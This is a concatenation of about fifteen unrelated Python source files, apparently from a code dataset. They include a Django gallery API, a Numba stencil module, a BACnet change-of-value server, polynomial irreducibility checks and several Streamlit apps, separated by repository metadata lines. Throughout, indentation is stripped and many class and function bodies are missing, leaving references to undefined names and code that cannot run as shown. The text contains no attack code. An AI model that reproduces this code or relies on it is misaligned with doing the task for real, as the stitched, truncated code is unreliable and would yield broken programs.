# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################
"""
Gallery API
::
GET / Lists the galleries currently visible by the current user
POST / Creates a gallery object
GET /id Gallery object if visible by the current user
PUT /id Adds image or video objects to the gallery
DELETE /id Removes image or video objects from the gallery
GET /filter Returns a filtered list of image and video objects
"""
import time
import functools
import logging
import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json
try:
from haystack.query import SearchQuerySet
HAYSTACK = True
except (ImportError, ImproperlyConfigured):
HAYSTACK = False
from frog.models import (
Gallery,
Image,
Video,
Group,
GallerySubscription,
SiteConfig,
Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP
LOGGER = logging.getLogger("frog")
try:
QUERY_MODELS = [
_
for _ in ContentType.objects.filter(app_label="frog")
if issubclass(_.model_class(), Piece)
]
except ProgrammingError:
pass
BATCH_LENGTH = 75
def index(request, obj_id=None):
"""Handles a request based on method and calls the appropriate function"""
if request.method == "GET":
return get(request, obj_id)
elif request.method == "POST":
return post(request)
elif request.method == "PUT":
return put(request, obj_id)
elif request.method == "DELETE":
return delete(request, obj_id)
def _filter(request, object_, tags=None, more=False, orderby="created"):
"""Filters Piece objects from self based on filters, search, and range
:param tags: List of tag IDs to filter
:type tags: list
:param more -- bool, Returns more of the same filtered set of images based on session range
return list, Objects filtered
"""
res = Result()
idDict = {}
objDict = {}
data = {}
modelmap = {}
# Get all IDs for each model
for m in QUERY_MODELS:
modelmap[m.model_class()] = m.model
if object_:
idDict[m.model] = m.model_class().objects.filter(gallery=object_)
else:
idDict[m.model] = m.model_class().objects.all()
if idDict[m.model] is None:
continue
if tags:
for bucket in tags:
searchQuery = ""
o = None
for item in bucket:
if item == 0:
# filter by tagless
idDict[m.model].annotate(num_tags=Count("tags"))
if not o:
o = Q()
o |= Q(num_tags__lte=1)
break
elif isinstance(item, six.integer_types):
# filter by tag
if not o:
o = Q()
o |= Q(tags__id=item)
else:
# add to search string
searchQuery += item + " "
if not HAYSTACK:
if not o:
o = Q()
# use a basic search
o |= Q(title__icontains=item)
if HAYSTACK and searchQuery != "":
# once all tags have been filtered, filter by search
searchIDs = search(searchQuery, m.model_class())
if searchIDs:
if not o:
o = Q()
o |= Q(id__in=searchIDs)
if o:
# apply the filters
idDict[m.model] = (
idDict[m.model]
.annotate(num_tags=Count("tags"))
.filter(o)
)
else:
idDict[m.model] = idDict[m.model].none()
# Remove hidden items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(hidden=True)
# Remove deleted items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(deleted=True)
# Get all ids of filtered objects, this will be a very fast query
idDict[m.model] = list(
idDict[m.model]
.order_by("-{}".format(orderby))
.values_list("id", flat=True)
)
lastid = request.session.get("last_{}".format(m.model), 0)
if not idDict[m.model]:
continue
if not more:
lastid = idDict[m.model][0]
try:
index = idDict[m.model].index(lastid)
except ValueError:
index = 0
if more and lastid != 0:
index += 1
idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]
# perform the main query to retrieve the objects we want
objDict[m.model] = m.model_class().objects.filter(
id__in=idDict[m.model]
)
objDict[m.model] = (
objDict[m.model]
.select_related("author")
.prefetch_related("tags")
.order_by("-{}".format(orderby))
)
objDict[m.model] = list(objDict[m.model])
# combine and sort all objects by date
objects = _sortObjects(orderby, **objDict)
objects = objects[:BATCH_LENGTH]
# Find out last ids
lastids = {}
for obj in objects:
lastids["last_{}".format(modelmap[obj.__class__])] = obj.id
for key, value in lastids.items():
request.session[key] = value
# serialize objects
for i in objects:
res.append(i.json())
data["count"] = len(objects)
if settings.DEBUG:
data["queries"] = connection.queries
res.value = data
return JsonResponse(res.asDict())
def _sortObjects(orderby="created", **kwargs):
"""Sorts lists of objects and combines them into a single list"""
o = []
for m in kwargs.values():
for l in iter(m):
o.append(l)
o = list(set(o))
sortfunc = _sortByCreated if orderby == "created" else _sortByModified
if six.PY2:
o.sort(sortfunc)
else:
o.sort(key=functools.cmp_to_key(sortfunc))
return o
def _sortByCreated(a, b):
"""Sort function for object by created date"""
if a.created < b.created:
return 1
elif a.created > b.created:
return -1
else:
return 0
def _sortByModified(a, b):
"""Sort function for object by modified date"""
if a.modified < b.modified:
return 1
elif a.modified > b.modified:
return -1
else:
return 0
def search(query, model):
""" Performs a search query and returns the object ids """
query = query.strip()
LOGGER.debug(query)
sqs = SearchQuerySet()
results = sqs.raw_search("{}*".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}*".format(query)).models(model)
return [o.pk for o in results]
| 30.312364 | 98 | 0.592672 |
4c2be9c37717776782c0be6604333fcf9bf8eb67
| 2,232 |
py
|
Python
|
pirates/speedchat/PSpeedChatQuestMenu.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3 |
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/speedchat/PSpeedChatQuestMenu.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/speedchat/PSpeedChatQuestMenu.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1 |
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.speedchat.PSpeedChatQuestMenu
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCTerminal import *
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from pirates.quest.Quest import Quest
from pirates.speedchat.PSpeedChatQuestTerminal import *
from pirates.pirate.LocalPirate import *
from pirates.quest.QuestStatus import *
from pirates.quest.QuestDNA import *
| 39.857143 | 106 | 0.670699 |
4c2cd54fa6ab0d6c947d651db03fbbb610a1bf1d
| 5,309 |
py
|
Python
|
spotifyembed/spotifyembed.py
|
R3XET/coffee-cogs
|
e7658213449ec140edaaf322514eaafb575f99bd
|
[
"MIT"
] | null | null | null |
spotifyembed/spotifyembed.py
|
R3XET/coffee-cogs
|
e7658213449ec140edaaf322514eaafb575f99bd
|
[
"MIT"
] | null | null | null |
spotifyembed/spotifyembed.py
|
R3XET/coffee-cogs
|
e7658213449ec140edaaf322514eaafb575f99bd
|
[
"MIT"
] | null | null | null |
# from redbot.core import Config
from redbot.core import Config, commands, checks
import asyncio
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
import re
| 41.155039 | 197 | 0.595592 |
4c2d9f91e47f374b558a37fc891829c105809bba
| 4,714 |
py
|
Python
|
rlcard/utils/seeding.py
|
AdrianP-/rlcard
|
5b99dc8faa4c97ecac2d1189967b90c45d79624b
|
[
"MIT"
] | null | null | null |
rlcard/utils/seeding.py
|
AdrianP-/rlcard
|
5b99dc8faa4c97ecac2d1189967b90c45d79624b
|
[
"MIT"
] | null | null | null |
rlcard/utils/seeding.py
|
AdrianP-/rlcard
|
5b99dc8faa4c97ecac2d1189967b90c45d79624b
|
[
"MIT"
] | null | null | null |
#The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import hashlib
import numpy as np
import os
import struct
def colorize(string, color, bold=False, highlight = False):
"""Return string surrounded by appropriate terminal color codes to
print colorized text. Valid colors: gray, red, green, yellow,
blue, magenta, cyan, white, crimson
"""
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
attrs = ';'.join(attr)
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def hash_seed(seed=None, max_bytes=8):
"""Any given evaluation is likely to have many PRNG's active at
once. (Most commonly, because the environment is running in
multiple processes.) There's literature indicating that having
linear correlations between seeds of multiple PRNG's can correlate
the outputs:
http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
http://dl.acm.org/citation.cfm?id=1276928
Thus, for sanity we hash the seeds before using them. (This scheme
is likely not crypto-strength, but it should be good enough to get
rid of simple correlations.)
Args:
seed (Optional[int]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the hashed seed.
"""
if seed is None:
seed = create_seed(max_bytes=max_bytes)
hash = hashlib.sha512(str(seed).encode('utf8')).digest()
return _bigint_from_bytes(hash[:max_bytes])
def create_seed(a=None, max_bytes=8):
"""Create a strong random seed. Otherwise, Python 2 would seed using
the system time, which might be non-robust especially in the
presence of concurrency.
Args:
a (Optional[int, str]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the seed.
"""
# Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
if a is None:
a = _bigint_from_bytes(os.urandom(max_bytes))
elif isinstance(a, str):
a = a.encode('utf8')
a += hashlib.sha512(a).digest()
a = _bigint_from_bytes(a[:max_bytes])
elif isinstance(a, int):
a = a % 2**(8 * max_bytes)
else:
raise error.Error('Invalid type for seed: {} ({})'.format(type(a), a))
return a
# TODO: don't hardcode sizeof_int here
| 41.350877 | 461 | 0.694103 |
4c2f421ab198ddb3faa7c72a6c2f2f1822a0634f
| 8,573 |
py
|
Python
|
ops/transforms.py
|
ex4sperans/freesound-classification
|
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
|
[
"Apache-2.0"
] | 55 |
2019-06-30T02:36:10.000Z
|
2021-12-07T07:24:42.000Z
|
ops/transforms.py
|
ex4sperans/freesound-classification
|
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
|
[
"Apache-2.0"
] | 13 |
2020-01-28T22:48:34.000Z
|
2022-03-11T23:50:36.000Z
|
ops/transforms.py
|
ex4sperans/freesound-classification
|
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
|
[
"Apache-2.0"
] | 7 |
2019-07-21T15:54:16.000Z
|
2020-07-22T13:02:37.000Z
|
import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
| 22.679894 | 84 | 0.561647 |
4c30506aa8598c0388ff7d67c1b22762e60080e5
| 2,011 |
py
|
Python
|
figures/pp.py
|
mathematicalmichael/thesis
|
2906b10f94960c3e75bdb48e5b8b583f59b9441e
|
[
"MIT"
] | 6 |
2019-04-24T08:05:49.000Z
|
2020-12-28T20:34:29.000Z
|
figures/pp.py
|
mathematicalmichael/thesis
|
2906b10f94960c3e75bdb48e5b8b583f59b9441e
|
[
"MIT"
] | 59 |
2019-12-27T23:15:05.000Z
|
2021-11-24T17:52:57.000Z
|
figures/pp.py
|
mathematicalmichael/thesis
|
2906b10f94960c3e75bdb48e5b8b583f59b9441e
|
[
"MIT"
] | null | null | null |
#!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
else: # N(0,1)
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| 32.967213 | 111 | 0.61462 |
4c308137f6fcaffcc096aaa674f08780ed2a8ef7
| 3,606 |
py
|
Python
|
additions/irreducible_check.py
|
kluhan/seraphim
|
412b693effb15f80d348d6d885d7c781774bb8aa
|
[
"MIT"
] | null | null | null |
additions/irreducible_check.py
|
kluhan/seraphim
|
412b693effb15f80d348d6d885d7c781774bb8aa
|
[
"MIT"
] | null | null | null |
additions/irreducible_check.py
|
kluhan/seraphim
|
412b693effb15f80d348d6d885d7c781774bb8aa
|
[
"MIT"
] | null | null | null |
"""
Irreduzibilittskriterien
Implementiert wurden das Eisenstein- und das Perronkriterium
Quellen:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
bergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten
"""
import logging
import helper
import itertools
# rekursive Implementierung von HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""berprft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen wrden Ergebnis von HCF verflschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
Prft ein Polynom auf Irreduzierbarkeit (Perron).
Fhrender Koeffizient != 1 funktioniert nicht.
Keine Aussage mglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungltig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
Eine Implementierung des Eisensteinkriteriums.
"""
# Polynom muss einen Grad m >= 1 haben
if polynomial.degree() < 1:
return 2
# Voraussetzung fr Eisenstein sind teilerfremde Koeffizienten
if helper.is_polynomial_coprime(polynomial is False):
return 2
# Prfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
# Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden
return 1
| 27.112782 | 121 | 0.646977 |
4c30bd2dd03a5aeb1d8422cd8b6cb2d539652200
| 39,763 |
py
|
Python
|
numba/stencils/stencil.py
|
auderson/numba
|
3d67c9850ab56457f418cf40af6245fd9c337705
|
[
"BSD-2-Clause"
] | 6,620 |
2015-01-04T08:51:04.000Z
|
2022-03-31T12:52:18.000Z
|
numba/stencils/stencil.py
|
auderson/numba
|
3d67c9850ab56457f418cf40af6245fd9c337705
|
[
"BSD-2-Clause"
] | 6,457 |
2015-01-04T03:18:41.000Z
|
2022-03-31T17:38:42.000Z
|
numba/stencils/stencil.py
|
auderson/numba
|
3d67c9850ab56457f418cf40af6245fd9c337705
|
[
"BSD-2-Clause"
] | 930 |
2015-01-25T02:33:03.000Z
|
2022-03-30T14:10:32.000Z
|
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
| 47.849579 | 141 | 0.554133 |
4c30fc13cf631ce207921b9c3acc713c3fb36b5f
| 3,754 |
py
|
Python
|
examples/bicycle/bicycle_dynamics.py
|
lujieyang/irs_lqr
|
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
|
[
"MIT"
] | 6 |
2021-11-20T19:05:06.000Z
|
2022-01-31T00:10:41.000Z
|
examples/bicycle/bicycle_dynamics.py
|
lujieyang/irs_lqr
|
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
|
[
"MIT"
] | 10 |
2021-07-24T19:50:36.000Z
|
2021-11-20T19:06:40.000Z
|
examples/bicycle/bicycle_dynamics.py
|
lujieyang/irs_lqr
|
bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f
|
[
"MIT"
] | 1 |
2021-12-15T22:09:31.000Z
|
2021-12-15T22:09:31.000Z
|
import numpy as np
import pydrake.symbolic as ps
import torch
import time
from irs_lqr.dynamical_system import DynamicalSystem
| 28.225564 | 91 | 0.483751 |
4c30fdedde14a46b90015527caf9d689634cdfab
| 6,504 |
py
|
Python
|
apps/proportions.py
|
harmkenn/PST_Deploy_Test
|
2484acf13f1f998c98fa94fad98c1f75c27d292b
|
[
"MIT"
] | null | null | null |
apps/proportions.py
|
harmkenn/PST_Deploy_Test
|
2484acf13f1f998c98fa94fad98c1f75c27d292b
|
[
"MIT"
] | null | null | null |
apps/proportions.py
|
harmkenn/PST_Deploy_Test
|
2484acf13f1f998c98fa94fad98c1f75c27d292b
|
[
"MIT"
] | null | null | null |
import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
| 48.177778 | 207 | 0.482934 |
4c31c440814ac777bd4779fa4968cf1b1847bcac
| 1,263 |
py
|
Python
|
integration/v2/test_service_instances.py
|
subhash12/cf-python-client
|
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
|
[
"Apache-2.0"
] | 47 |
2017-12-17T00:54:33.000Z
|
2022-02-25T09:54:52.000Z
|
integration/v2/test_service_instances.py
|
subhash12/cf-python-client
|
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
|
[
"Apache-2.0"
] | 125 |
2017-10-27T09:38:10.000Z
|
2022-03-10T07:53:35.000Z
|
integration/v2/test_service_instances.py
|
subhash12/cf-python-client
|
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
|
[
"Apache-2.0"
] | 50 |
2018-01-19T07:57:21.000Z
|
2022-02-14T14:47:31.000Z
|
import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
| 43.551724 | 129 | 0.69517 |
4c31cf7c510d884081297346de14530206f0c46f
| 24 |
py
|
Python
|
runway/core/providers/__init__.py
|
troyready/runway
|
4fd299961a4b73df39e14f4f19a7236f7be17dd8
|
[
"Apache-2.0"
] | 134 |
2018-02-26T21:35:23.000Z
|
2022-03-03T00:30:27.000Z
|
runway/core/providers/__init__.py
|
asksmruti/runway
|
8aca76df9372e3d13eb35e12f81758f618e89e74
|
[
"Apache-2.0"
] | 937 |
2018-03-08T22:04:35.000Z
|
2022-03-30T12:21:47.000Z
|
runway/core/providers/__init__.py
|
asksmruti/runway
|
8aca76df9372e3d13eb35e12f81758f618e89e74
|
[
"Apache-2.0"
] | 70 |
2018-02-26T23:48:11.000Z
|
2022-03-02T18:44:30.000Z
|
"""Runway providers."""
| 12 | 23 | 0.625 |
4c32dcda5e8a9e2b82a81dd52550421a3c5cdcea
| 13,265 |
py
|
Python
|
samples/COVServer.py
|
noelli/bacpypes
|
c2f4d753ed86bc0357823e718e7ff16c05f06850
|
[
"MIT"
] | null | null | null |
samples/COVServer.py
|
noelli/bacpypes
|
c2f4d753ed86bc0357823e718e7ff16c05f06850
|
[
"MIT"
] | null | null | null |
samples/COVServer.py
|
noelli/bacpypes
|
c2f4d753ed86bc0357823e718e7ff16c05f06850
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
#
# COVConsoleCmd
#
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| 30.354691 | 87 | 0.618168 |
4c32edf19e346b501323693f4025d8d4782f7d64
| 973 |
py
|
Python
|
server/glassface/facebookfriender/views.py
|
theopak/glassface
|
bcb6c02636bda069d604a4da1dd09222e99be356
|
[
"MIT"
] | 1 |
2017-02-24T16:18:24.000Z
|
2017-02-24T16:18:24.000Z
|
server/glassface/facebookfriender/views.py
|
theopak/glassface
|
bcb6c02636bda069d604a4da1dd09222e99be356
|
[
"MIT"
] | null | null | null |
server/glassface/facebookfriender/views.py
|
theopak/glassface
|
bcb6c02636bda069d604a4da1dd09222e99be356
|
[
"MIT"
] | null | null | null |
import os
import platform
import subprocess
from django.http import HttpResponse
from django.conf import settings
| 38.92 | 137 | 0.732785 |
4c330026016ced54e01a326234695f3fe1fb584f
| 5,187 |
py
|
Python
|
fancylit/modeling/yellowbrick_funcs.py
|
rubyruins/fancylit
|
56a7cdfe78edd687a3b318bbbfa534203de1ace8
|
[
"Apache-2.0"
] | null | null | null |
fancylit/modeling/yellowbrick_funcs.py
|
rubyruins/fancylit
|
56a7cdfe78edd687a3b318bbbfa534203de1ace8
|
[
"Apache-2.0"
] | null | null | null |
fancylit/modeling/yellowbrick_funcs.py
|
rubyruins/fancylit
|
56a7cdfe78edd687a3b318bbbfa534203de1ace8
|
[
"Apache-2.0"
] | null | null | null |
import random
import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px
def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
"""
Purpose:
Prep data for modeling
Args:
df - Pandas dataframe
Returns:
test_features - test set features
train_features - train set feautres
test_target - test set target
train_target - train set target
"""
# Specify the target classes
target_string = st.selectbox("Select Target Column", df.columns)
target = np.array(df[target_string])
# Select Features you want
feature_cols = st.multiselect("Select Modeling Features", df.columns)
# Get all features
features = df[feature_cols]
featurestmp = np.array(features)
feats = []
# find all bad rows
for index, featarr in enumerate(featurestmp):
try:
featarr = featarr.astype(float)
feats.append(featarr)
except Exception as error:
st.error(error)
st.error(featarr)
st.stop()
featuresarr = np.array(feats)
# Split Data
randInt = random.randint(1, 200)
(
test_features,
train_features,
test_target,
train_target,
) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)
return (
test_features,
train_features,
test_target,
train_target,
)
def show_classification_report(
df: pd.DataFrame,
) -> None:
"""
Purpose:
Renders a classification_report
Args:
df - Pandas dataframe
Returns:
N/A
"""
# Prep data for model training
(
test_features,
train_features,
test_target,
train_target,
) = data_prep(df)
if st.button("Train Model"):
st.header("Classification Report")
st.markdown(
"The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
)
# Instantiate the visualizer
visualizer = classification_report(
GaussianNB(),
train_features,
train_target,
test_features,
test_target,
support=True,
)
# Get the viz
fig = visualizer.fig
ax = visualizer.show()
fig.axes.append(ax)
# show the viz
st.write(fig)
# TODO download model, Download report
# TODO live predictions
def feature_correlation(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a feature correlation graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
target_string = st.selectbox("Select Target Column", df.columns,
key="selectbox-feature-correlation")
residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
feature_cols = st.multiselect("Select Modeling Features", residual_cols,
key="multiselect-feature-correlation",
default=residual_cols[:5])
if str(df[target_string].dtype) == "object":
method = 'mutual_info-classification'
else:
type_problem = st.selectbox("Select the type of problem",
['classification', 'regression'])
if type_problem == 'classification':
method = st.selectbox("Select the correlation method",
['mutual_info-classification', 'pearson'])
else:
